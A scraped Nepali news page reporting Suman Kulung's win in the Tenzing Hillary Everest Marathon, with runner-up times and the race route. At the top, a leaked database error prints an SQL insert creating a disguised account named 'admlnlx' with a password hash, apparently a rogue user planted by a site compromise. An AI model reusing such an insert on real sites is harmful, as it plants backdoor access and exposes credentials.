WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4X3xf7NUwE2LmPSNeMpYPmiXp1NKI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:43:49', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
एभरेष्ट म्याराथनको उपाधी सुमन कुलुङलाई – Gaule Khabar

एभरेष्ट म्याराथनको उपाधी सुमन कुलुङलाई

एभरेष्ट म्याराथनको उपाधी सुमन कुलुङलाई

गाउँले न्यूज, १५ जेष्ठ, सोलुखुम्बु । ६६ औं अन्तराष्ट्रिय सगरमाथा दिवसको अवसरमा अयोजित तेञ्जिङ हिलारी एभरेष्ट म्याराथनको उपाधी सुमन कुलुङले जितेका छन् । कुलुङले ४२ दशमलव १६ किलोमिटरको दूरी ३ घण्टा ४७ मिनेट १६ सेकेण्डमा पूरा गर्दै पहिलो भएका हुन् ।

रुकुमका कपिलदेव बुढाले निर्धारित ४२ किलोकिटर धुरी ३ घण्टा ५६ मिनेट दुरी पुरा गर्दै द्धितिय भए । त्यस्तै राम कुमार राजभण्डारीले ३ घण्टा ५८ मिनेटमा धुरी पुरा गरि तृतिय स्थान हात पारेको छन ।


आज बिहान सगरमाथाको आधारशिविरबाट शुरु भएको म्यारथन गोरक्सेप, लोवुचे, थुक्ला। फेरिचे, दिङवोचे, पाङवोचे, तेङवोचे क्याङेमा हुदै नाम्चे बजारको चौरक्याम्पमा आएर समापन भएको हिमालय एक्पिडिशनले जनाएकाे छ ।

६० किलोमिटरको अल्ट्रा म्याराथन, २१ किलोमिटरको हाफ म्याराथनको भने नतिजा आउन बाँकी रहेको नाम्चेबाट आयोजकले जनाएको छ । ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका